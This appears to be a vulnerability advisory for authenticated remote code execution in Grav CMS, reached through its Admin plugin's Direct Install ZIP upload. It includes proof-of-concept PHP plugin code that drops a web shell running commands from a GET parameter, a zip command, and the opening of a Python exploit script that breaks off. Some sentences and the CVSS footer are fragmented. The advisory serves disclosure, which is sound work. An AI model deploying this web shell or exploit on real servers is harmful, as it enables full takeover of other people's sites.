An authenticated user with administrative privileges can achieve Remote Code Execution (RCE) by uploading a specially crafted ZIP file through the "Direct Install" tool. While the system attempts to block direct .php file uploads, it fails to inspect the contents of uploaded ZIP archives. Once a malicious plugin is extracted, it can execute arbitrary PHP code or drop a persistent web shell on the server.
The vulnerability exists in the handling of the directInstall task within the Admin plugin and the Grav Package Manager (GPM) core.
plugins/ or /user/themes/ directories without validating the file extensions or the content of the files inside the archive.
Create a directory named shellplugin and add the following files:
shellplugin.php:
<?php
namespace Grav\Plugin;
use Grav\Common\Plugin;
class ShellpluginPlugin extends Plugin {
public static function getSubscribedEvents(): array {
return ['onPluginsInitialized' => ['onPluginsInitialized', 0]];
}
public function onPluginsInitialized(): void {
$shell_path = GRAV_ROOT . '/shell.php';
if (!file_exists($shell_path)) {
file_put_contents($shell_path, '<?php system($_GET["cmd"]); ?>');
}
}
}
(Also include a basic blueprints.yaml and shellplugin.yaml as per Grav standards).
`zip -r /tmp/shellplugin.zip shellplugin/`
3. Execute the Exploit Script
Run the following Python script to automate the login, nonce retrieval, and malicious upload process:
`import requests, re, json
s = requests.Session()
BASE_URL = 'http://127.0.0.1'
2.0.0-beta.2Exploitability
AV:NAC:LPR:HUI:NScope
S:CImpact
C:HI:HA:H9.1/CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H